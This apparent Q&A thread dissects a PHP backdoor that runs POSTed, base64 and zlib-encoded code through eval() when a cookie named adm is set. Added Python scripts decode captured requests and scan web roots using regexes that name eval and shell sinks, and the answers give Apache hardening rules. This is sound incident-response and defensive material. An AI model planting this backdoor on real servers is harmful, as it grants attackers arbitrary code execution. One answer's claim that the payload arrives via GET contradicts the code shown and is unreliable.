Duncan

Reputation: 53

PHP code help - hacked apache server

I have discovered the following code appearing in two identical .php files on more than one of my server's websites. The files have inconspicuous names such as "reminder.php" (but a different name every time) and appear in my /scripts/ and /uploads/ folders, sometimes other folders instead.

Their appearance is not entirely random but I don't know enough about Apache servers or PHP to know a) how it got there b) what it does.

Checking the logs they all appeared at similar times and were called once and that is all.

Any help would be greatly appreciated.

<?php
// Dropped backdoor, as found: it only does anything when the request carries a cookie named "adm"
if (isset($_COOKIE["adm"])) {
    // ...and a POST body with both a "crc" and a "cmd" field
    if (isset($_POST['crc'], $_POST['cmd'])) {
        // "crc" must equal the unsigned CRC-32 of the still-encoded "cmd" string
        if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
            // "cmd" is base64(zlib-compressed PHP source); it is decoded and run with eval()
            eval(gzuncompress(base64_decode($_POST['cmd'])));
        } else
            echo "repeat_cmd";   // signals the client that the payload arrived damaged, resend it
    }
}

Upvotes: 5

Views: 5233
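The dropped file only runs what arrives in the POST body, so the access log will show a single hit and nothing else. If the body of that request was captured anywhere (a mod_security audit log, a packet capture, a reverse-proxy log), the following script recovers the PHP the attacker actually ran, without executing it. This is an added example, not code from the question or from any of the answers; the function names, the sample body and the assumption that you hold the raw form-encoded body are mine.

```python
"""Decode a captured request to the backdoor quoted above, without executing it."""
import base64
import zlib
from urllib.parse import parse_qs, urlencode


def php_crc32_unsigned(data: bytes) -> str:
    """The value PHP's sprintf('%u', crc32($s)) yields: CRC-32 as unsigned decimal text."""
    return str(zlib.crc32(data) & 0xFFFFFFFF)


def decode_cmd(crc: str, cmd: str) -> str:
    """Undo eval(gzuncompress(base64_decode($cmd))) and return the PHP source.

    Raises ValueError when the backdoor's own CRC check would have failed
    (it answers "repeat_cmd" in that case and runs nothing).
    """
    # The backdoor checks the CRC of the still-encoded cmd string, not of the decoded code.
    if php_crc32_unsigned(cmd.encode()) != crc:
        raise ValueError("crc mismatch: the backdoor would have replied repeat_cmd")
    # PHP's base64_decode() is lenient and drops characters outside the alphabet
    # (e.g. a '+' that turned into a space in transit); validate=False mirrors that.
    raw = base64.b64decode(cmd, validate=False)
    # gzuncompress() is zlib (RFC 1950) inflate, not gzip, so zlib.decompress matches it.
    return zlib.decompress(raw).decode("utf-8", errors="replace")


def decode_post_body(body: str) -> str:
    """Take a raw application/x-www-form-urlencoded POST body and return the decoded PHP."""
    params = parse_qs(body, keep_blank_values=True)
    if "crc" not in params or "cmd" not in params:
        raise ValueError("body lacks crc or cmd: the backdoor would have ignored it")
    return decode_cmd(params["crc"][0], params["cmd"][0])


def build_sample_body(php_source: str) -> str:
    """Constructed test input only (not a captured attacker payload): encode PHP the way
    the backdoor expects so the decoder above can be exercised offline."""
    cmd = base64.b64encode(zlib.compress(php_source.encode())).decode("ascii")
    return urlencode({"crc": php_crc32_unsigned(cmd.encode("ascii")), "cmd": cmd})


if __name__ == "__main__":
    # Constructed sample body; in a real incident this comes from an audit log or pcap.
    sample = build_sample_body('<?php echo "constructed sample, not real attacker code"; ?>')
    print("captured body :", sample)
    print("decoded cmd   :", decode_post_body(sample))
```

The CRC is only a transport check, not authentication: anyone who can set a cookie named adm and compute a CRC-32 can drive the file, which is why every answer below says to take the site down first and ask questions after.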

Answers (4)

regilero

Reputation: 30536

The main problem for you is, how did these files get here?

Several possibilities:

  • the FTP client of someone having FTP access to the server is hit by a virus. This is an easy way for hackers to put PHP scripts on a web server. So run a recent antivirus on all computers having access via FTP to your webserver
  • the webserver runs several web applications and one of them is really bad, so do not forget to check all web applications, and maybe try to set different open_basedir restrictions on each web application (put that in virtualhosts). Study how to set per-application php settings with php_value instructions and adapt at least open_basedir, upload_tmp_dir and session.save_path
  • your current web application allows files to be uploaded on directories, check all your file uploads snippets, and read the PHPSec Security Guide (and any other resource on PHP security like the Architect's Guide To PHP Security by Ilia Alshanetsky ) to fix them.
  • if you cannot fix the application, then study solutions proxying the application with some security rules, filtering user inputs, like, maybe, mod_security, but there are others.

To avoid execution of PHP scripts on directories which should not contain php scripts (like your upload folders) you can add this rule (either in a <Directory> section or .htaccess):

AddType text/plain .php
AddType text/plain .phps
AddType text/plain .php3
AddType text/plain .php4
AddType text/plain .php5
Options -Indexes

This will force all php files from this directory to be served as simple text. Another solution is to force a lot of extensions to become cgi scripts, and then to disallow execution of cgi-scripts:

Options -ExecCGI
AddHandler cgi-script .php .php3 .php4 .php5 .phps .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi 

You could also limit the files allowed there based on extensions (here if it is not an image it's forbidden):

# <Files> takes a literal name or a shell glob, and "*.jpeg" is not a valid regex anyway;
# <FilesMatch> takes a PCRE. The negative lookahead matches every name that does NOT end
# in an image extension, and that set is denied (Apache 2.2 syntax; 2.4 uses Require all denied).
<FilesMatch "^(?!.*\.(jpe?g|png|gif)$)">
   Order deny,allow
   Deny from all
</FilesMatch>

Upvotes: 1
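Before hardening the upload directories it helps to know how many copies of the dropped file exist across all sites on the box, since the question says they turn up under different names and in different folders. The scanner below walks a web root, flags PHP files whose contents have the shape of the backdoor quoted above (a dynamic-code sink fed from request input or from a decoder), and flags every PHP file found inside a directory that should only hold uploads. It is an added example, not part of regilero's answer: the indicator regexes, the list of upload-directory names and the sample tree are my assumptions, and the constructed tree exists only so the script runs offline.

```python
"""Walk a web root and report PHP files that look like the dropped backdoor."""
from __future__ import annotations

import os
import re
import tempfile

# Indicator patterns (assumed list, kept loose because attackers vary the spelling).
INDICATORS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    ("gz_inflate", re.compile(r"\b(gzuncompress|gzinflate|gzdecode)\s*\(")),
    ("request_input", re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[")),
    ("preg_replace_e", re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]")),
    ("system_exec", re.compile(r"\b(system|passthru|shell_exec|exec|proc_open|popen)\s*\(")),
]
PHP_SUFFIXES = (".php", ".php3", ".php4", ".php5", ".phps", ".phtml")
# Directory names that should never legitimately contain PHP (assumed; adjust per site).
UPLOAD_DIR_NAMES = {"uploads", "upload", "files", "images", "tmp", "cache"}


def indicators_in(path: str) -> list[str]:
    """Return the names of the indicator patterns that match the file's contents."""
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="replace")
    return [name for name, rx in INDICATORS if rx.search(text)]


def is_suspicious(found: list[str], under_upload_dir: bool) -> bool:
    """eval() reached from request input or from a decoder is the shape on this page;
    preg_replace /e, or a shell sink fed from the request, is the same idea in other
    clothes; and any PHP file at all inside an upload directory deserves a look."""
    if "eval" in found and ({"request_input", "base64_decode", "gz_inflate"} & set(found)):
        return True
    if "preg_replace_e" in found or ("system_exec" in found and "request_input" in found):
        return True
    return under_upload_dir


def scan_tree(root: str) -> dict[str, list[str]]:
    """Map relative path (always '/'-separated) -> matched indicators, for flagged files."""
    hits: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        under_upload = bool(set(rel_dir.split(os.sep)) & UPLOAD_DIR_NAMES)
        for name in files:
            if not name.lower().endswith(PHP_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            found = indicators_in(path)
            if is_suspicious(found, under_upload):
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


# The backdoor from the question, embedded as scanner test input.
BACKDOOR_SAMPLE = """<?php
if (isset($_COOKIE["adm"])) {
    if (isset($_POST['crc'], $_POST['cmd'])) {
        if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
            eval(gzuncompress(base64_decode($_POST['cmd'])));
        } else
            echo "repeat_cmd";
    }
}
"""


def build_sample_tree() -> str:
    """Constructed web root (not a real site) exercising each branch of is_suspicious()."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "uploads/reminder.php": BACKDOOR_SAMPLE,                       # the dropped file
        "uploads/thumb.php": '<?php readfile("thumb.png"); ?>',        # PHP where only uploads belong
        "uploads/avatar.jpg": "not php, ignored",
        "includes/db.php": "<?php echo htmlspecialchars($_POST['q']); ?>",   # input, no sink
        "scripts/helper.php": "<?php function helper() { return 1; } ?>",     # benign
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, found in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{rel}: {', '.join(found) or 'php file inside an upload directory'}")
```

Run it against the real document root of every virtual host, not just the one site where the files were noticed. A clean scan is not proof of a clean box: heavier obfuscation (string concatenation, variable functions, str_rot13) slips past a list like this, so treat the output as a starting point and still follow the advice in the other answers about rebuilding from known-good sources.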

Blender

Reputation: 298532

Basically, that code lets a user do this:

yoursite.com/reminder.php?cmd=blahblahblah

This part:

blahblahblah

Is a gzip compressed base64 encoded string. Once decoded and uncompressed, it is eval()'d by the server.

In other words, your server is screwed, because anybody can run any code on it, including uploading files, deleting things, editing things, etc.

I suggest you take your site offline right now until you fix it.


The problem might be an unsanitized and public /uploads directory. If you don't filter users' uploads and keep your uploads folder public, they can upload and execute anything they wish.

What is running on your website? A CMS? Or is it entirely hand-made?

Upvotes: 1

Cyclone

Reputation: 18295

The file allows malicious person(s) to execute any PHP code they want on your system.

Basically, if certain validations have been met (i.e. the malicious person has that given cookie value), it will take the POSTed "cmd", base64 decode it, gzip uncompress it, and evaluate it as PHP.

I'd recommend changing your passwords, and maybe reinstalling apache for good measure. Remove these files immediately as well, or if at all remotely possible, restore from a backup.

Upvotes: 2

Michael Petrotta

Reputation: 60972

This code will execute (on the server) any arbitrary code it finds in the POST request if the key adm is present in the client's cookie. That request will be Base-64 encoded and encrypted to obfuscate its contents. Any code at all may be executed, including one to format your hard drive (if your PHP server is set to allow that).

You have been hacked. Take the server offline, right now. Get some help running an analysis before you wipe your host, if you can - you don't want to reinstall and go online, just to get hacked again. Changing all your passwords and locking down your server is a good start.

Upvotes: 1
